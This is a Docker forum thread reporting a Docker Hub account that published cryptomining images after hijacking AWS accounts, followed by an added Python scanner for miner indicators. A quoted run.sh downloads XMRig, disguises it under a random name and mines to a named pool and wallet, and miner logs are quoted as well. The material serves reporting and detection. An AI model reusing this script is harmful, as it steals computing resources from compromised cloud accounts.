Hi, this user is posting malicious images on Docker Hub as well as conducting attacks on cloud accounts.
Best Regards
rimelek (Ákos Takács), April 5, 2025, 11:11am (post 2)
Thank you for reporting it. I saw that people also reported Docker Hub accounts on GitHub:
opened 03:13PM - 03 Apr 24 UTC
Hello everyone, I would like to report a malicious image [https://hub.docker.com/r/gdus1is/lo](https://hub.docker.com/r/gdus1is/lo) (I also see that the account contains one more image, which was probably created for the same purpose: [https://hub.docker.com/r/gdus1is/la](https://hub.docker.com/r/gdus1is/la)).
The owner illegally accessed an AWS account, created an extra API key and started using the ECS service to mine cryptocurrency.
I have attached logs of this image and the run.sh file that is executed when the image is started.
run.sh
> APP=app$(shuf -i 1000000-9999999 -n 1)
> wget -q https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
> tar -zxf xmrig-6.14.1-linux-x64.tar.gz
> cd xmrig-6.14.1
> mv xmrig $APP
> chmod +x $APP
> ./$APP -a rx/0 -o us.zephyr.herominers.com:1123 -p x -t $(nproc --all) -u ZEPHs8EVgJXb6pqyj5mAc9E8z1Pu6feUYPZMXtprp6oQL8Z7qqQFiPwVv4d3UMuueAhrrcijPkMucWY4DG9aP2XAVZ8YTrNwMhB.gas1
Logs
> 2024-04-03 17:59:17 * ABOUT XMRig/6.14.1 gcc/5.4.0
> 2024-04-03 17:59:17 * LIBS libuv/1.41.0 OpenSSL/1.1.1k hwloc/2.4.1
> 2024-04-03 17:59:17 * HUGE PAGES supported
> 2024-04-03 17:59:17 * 1GB PAGES unavailable
> 2024-04-03 17:59:17 * CPU VirtualApple @ 2.50GHz (1) 64-bit AES
> 2024-04-03 17:59:17 L2:0.0 MB L3:0.0 MB 10C/10T NUMA:1
> 2024-04-03 17:59:17 * MEMORY 1.3/7.7 GB (18%)
> 2024-04-03 17:59:17 * DONATE 1%
> 2024-04-03 17:59:17 * ASSEMBLY auto:intel
> 2024-04-03 17:59:17 * POOL #1 us.zephyr.herominers.com:1123 algo rx/0
> 2024-04-03 17:59:17 * COMMANDS hashrate, pause, resume, results, connection
> 2024-04-03 17:59:17 * OPENCL disabled
> 2024-04-03 17:59:17 * CUDA disabled
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.772] net use pool us.zephyr.herominers.com:1123 15.204.46.117
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.776] net new job from us.zephyr.herominers.com:1123 diff 240009 algo rx/0 height 221407
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.777] cpu use argon2 implementation SSSE3
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr msr kernel module is not available
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.805] randomx init dataset algo rx/0 (10 threads) seed 59789da41f0fcfc7...
> 2024-04-03 17:59:17 [2024-04-03 17:59:17.809] randomx allocated 2336 MB (2080+256) huge pages 0% 0/1168 +JIT (3 ms)
> 2024-04-03 17:59:23 [2024-04-03 17:59:23.164] randomx dataset ready (5356 ms)
> 2024-04-03 17:59:23 [2024-04-03 17:59:23.165] cpu use profile * (10 threads) scratchpad 2048 KB
> 2024-04-03 17:59:23 [2024-04-03 17:59:23.170] cpu READY threads 10/10 (10) huge pages 0% 0/10 memory 20480 KB (4 ms)
And I created a roadmap item some years ago for reporting spam accounts:
opened 08:41PM - 11 May 22 UTC
community_new
docker_hub
**Tell us about your request**
There are many accounts on Docker Hub with only … pictures, external links to potentially malicious websites, software. We should have an easier way to report accounts or images. I would suggest a "Report" button on the page of every account and repository. It could be one button to open a confirmation page with an optional text field to add some explanation or a drop-down list to choose from some preconfigured possible reasons.
**Which service(s) is this request for?**
Docker Hub
**Tell us about the problem you're trying to solve. What are you trying to do, and why is it hard?**
There is a topic on the Docker forum with multiple reports. https://forums.docker.com/t/spam-post-on-docker-hub/112271/
I suggested reporting these on the Hub Feedback repo, where I found an existing issue: https://github.com/docker/hub-feedback/issues/2208
Unfortunately, I can understand why people don't want to contact Docker support or open a new issue. If someone realizes an account is a spammer, they just won't pull anything from that account and obviously won't click on anything, so it is mainly not for them but for everyone else. Although, when you search for something, it could be annoying to find multiple spam accounts.
**Additional context**
Since the user who reported the issue last time stated it was easy to find spam accounts, I tried to search on the Hub for "download" and I found one very soon. So having a report button is my short-term request, because I think it is much easier to implement than improving an automatic spam filter or even implementing one from scratch.
As far as I know, there is some progress, but there is no recommended way to report these accounts, so since you already reported it here I can share it with Docker, but I could not check the images yet. Can you tell me more about how you recognized that the images are malicious and that the user attacks cloud accounts?
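For anyone triaging a similar report, the run.sh and XMRig log quoted from the GitHub issue contain several independent indicators that can be checked in an image's entrypoint script or in container logs. The scanner below is an added example, not part of any post in this thread; the function names, hostnames, wallet placeholder and sample inputs are constructed for illustration.

```python
import re

# Indicator patterns modelled on the run.sh and XMRig log quoted in the thread.
INDICATORS = {
    "xmrig_name": re.compile(r"xmrig", re.I),
    "randomx_algo": re.compile(r"(?:-a|--algo|algo)[ =]+rx/\w+"),
    "pool_endpoint": re.compile(r"(?:-o|--url|POOL #\d+|use pool)\s+[\w.-]+:\d{2,5}"),
    "all_cores": re.compile(r"(?:-t|--threads)[ =]+\$\(nproc(?: --all)?\)"),
    "renamed_binary": re.compile(r"\bmv\s+xmrig\s+\$\w+"),
    "miner_log_line": re.compile(r"randomx\s+(?:init dataset|dataset ready)|\bnew job from\b"),
}

def scan(text):
    """Return the sorted names of indicators present in a script or log."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def looks_like_miner(text, threshold=2):
    """Require several independent indicators so one stray match is not an alert."""
    return len(scan(text)) >= threshold

# Constructed entrypoint script with the same shape as the reported run.sh.
SAMPLE_SCRIPT = r"""
APP=app$(shuf -i 1000000-9999999 -n 1)
wget -q https://downloads.example.invalid/xmrig-linux-x64.tar.gz
tar -zxf xmrig-linux-x64.tar.gz
mv xmrig $APP
./$APP -a rx/0 -o pool.example.invalid:1123 -p x -t $(nproc --all) -u WALLET_PLACEHOLDER
"""

# Constructed container log lines in the format of the quoted XMRig output.
SAMPLE_LOG = """
 * ABOUT        XMRig/6.14.1 gcc/5.4.0
 * POOL #1      pool.example.invalid:1123 algo rx/0
net      use pool pool.example.invalid:1123 203.0.113.10
net      new job from pool.example.invalid:1123 diff 240009 algo rx/0 height 1
randomx  dataset ready (5356 ms)
"""

# Constructed benign build script that also uses nproc, -o and -a.
BENIGN_SCRIPT = r"""
make -j $(nproc --all)
curl -o build.tar.gz https://example.invalid/src.tar.gz
tar -a -cf out.tar.zst build/
"""

if __name__ == "__main__":
    for label, text in [("script", SAMPLE_SCRIPT), ("log", SAMPLE_LOG), ("benign", BENIGN_SCRIPT)]:
        print(label, looks_like_miner(text), scan(text))
```

The `renamed_binary` pattern matters because the reported script renames the miner to a random `app<number>` name, so a process-name check alone would miss it.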